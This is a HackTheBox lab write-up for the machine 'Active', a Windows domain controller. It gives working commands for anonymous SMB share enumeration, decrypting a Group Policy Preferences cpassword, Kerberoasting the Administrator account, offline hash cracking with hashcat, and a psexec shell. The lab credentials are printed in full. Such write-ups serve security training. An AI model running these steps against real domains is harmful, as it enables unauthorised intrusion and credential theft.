PLATFORM | HackTheBox |
MACHINE | active |
OS | Windows |
IP | 10.10.10.100 |
FQDN | active.htb |
Summary
We Accessed Replication
share without credentials, this share was a copy of SYSVOL
, it contained a file Groups.xml
which is used to store Group Policy Preferences
informations including credentials. The password was encrypted using AES-256
but were able to decrypt it because the decryption key has been disclosed by Microsoft.
We were able to obtain the password hash of Administrator
because it has a SPN
, then crack it to get the password, this was easily done due to a weak password policy.
Vulns
- Information Disclosure - Groups.xml in Replication share
- Kerberoasting - CIFS spn affiliated with administrator
Enum
nmap
Initial nmap scan reveals multiple open ports including 88 (kerberos), 445 (smb), ldap (389) and rpc (135). The presense of these ports incdicate that this is a domain controller in the domain ACTIVE.HTB
port 445
Enumerating SMB shares shows that we have anonymous Read access over Replication
share
1
crackmapexec smb 10.10.10.100 -u '' -p '' --shares
This share seems to be a copy of SYSVOL
share which is used to store group policy templates, log on, logoff, startup and shutdown scripts.
1
smbclient -N //10.10.10.100/Replication
In \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
there is a file Groups.xml
containing SVC_TGS
user’s credentials.
1
2
cpassword="edBSHOwhZLTjtQS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYwNglVmQ"
userName="active.htb\SVC_TGS"
The password is encrypted using AES-256 but the decryption key has been disclosed by Microsoft
Foothold
After obtaining the encrypted GPP password, we used gpp-decrypt
tool to decrypt it. You can download the tool with the following command sudo apt install gpp-decrypt
1
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
The password of SVC_TGS
is GPPstillStandingStrong2k18
This user have read access over multiple shares
1
crackmapexec smb 10.10.10.100 -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 --shares
We could access SVC_TGS
home directory from Users
share and get the first flag.
1
smbclient -U active.htb/svc_tgs%GPPstillStandingStrong2k18 //10.10.10.100/Users
PrivEsc
What is a SPN?
SPN stands for Service Principal Name, it is an attribute that ties a service to a user account within the AD.
SPNs could be leveraged by an attacker to get a hash that can be cracked using a tool such as hashcat and obtain the password of the user associated with it. This type of attack is called Kerberoasting
We found a SPN
affiliated with the user Administrator
.
1
GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/svc_tgs:GPPstillStandingStrong2k18
We requested a Kerberos ticket for the spn CIFS
, this ticket was encrypted using the password hash of the user affiliated with this SPN, in this case the user was Administrator
1
GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/svc_tgs:GPPstillStandingStrong2k18 -request | tee tgs.hash
We were able to crack this hash offline using hashcat
.
1
hashcat -a 0 -m 13100 tgs.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
The Administrator
’s password is Ticketmaster1968
.
As Administrator, we have full access over all the shares.
Here we accessed the C$
share which is the root of the file system.
1
smbclient -U active.htb/administrator%Ticketmaster1968 //10.10.10.100/C\$
We can also leverage the write access over all the share to get a reverse shell using a tool such as psexec
.
1
psexec.py -dc-ip 10.10.10.100 active.htb/Administrator:Ticketmaster1968@10.10.10.100
This way, we accessed the DC as Administrator
and we got the root flag.